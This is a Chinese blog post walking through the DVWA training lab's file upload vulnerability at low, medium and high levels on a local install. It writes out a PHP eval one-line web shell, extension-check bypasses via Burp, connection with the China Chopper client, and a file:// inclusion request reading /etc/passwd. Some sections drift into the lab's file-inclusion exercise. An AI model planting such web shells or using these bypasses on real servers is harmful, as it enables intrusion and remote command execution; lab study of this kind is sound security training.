美文网首页
DVWA 之文件上传漏洞

DVWA 之文件上传漏洞

作者: 流_2908 | 来源:发表于2019-04-11 11:34 被阅读0次
  • List item

Low

没有进行任何过滤


在这里插入图片描述

首相,上传一个phpinfo.php,其内代码如下:
<?php phpinfo(); ?>

上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后访问

在这里插入图片描述
首先,写好

说明存在上传和执行漏洞

上传一句话木马:
<?php @eval($_POST[“hack”]); ?>
保存为hack.php
然后上传


在这里插入图片描述

找到文件上传目录

http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php

可以直接用hackbar这个插件,上传命令,爆出信息


在这里插入图片描述

使用菜刀连接


在这里插入图片描述
在这里插入图片描述
成功

Medium

有过滤


在这里插入图片描述

使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。
同时,因为替换的只是“../”、“..\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。
可以先在上传一个
此题要求,需要上传 .png或 .jpeg格式文件
因此,我们想到可以更改文件类型,然后上传
直接hack.php扩展名改为hack.png,然后上传,


在这里插入图片描述
可以上传成功,
使用菜刀连接
在这里插入图片描述

连接不上
制作图片码上传,同样如此
那么,可以使用burp抓包修改文件类型看看


在这里插入图片描述 在这里插入图片描述
成功

High

其过滤内容为


在这里插入图片描述

这个if语句的意思是如果page中不含有file并且page不等于include.php服务器才不会去包含相应的文件。两个条件只要不满足其中之一就可以,要么page等于include.php,要么page含有file。用file://流访问本地文件系统

http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd

在这里插入图片描述
说明存在命令执行
上菜刀,结果发现无聊是如何,jar版本的死活连不上,使用windows .exe版本的可以,我也懵逼
在这里插入图片描述
在这里插入图片描述

相关文章

网友评论

      本文标题:DVWA 之文件上传漏洞

      本文链接:https://www.haomeiwen.com/subject/onxtwqtx.html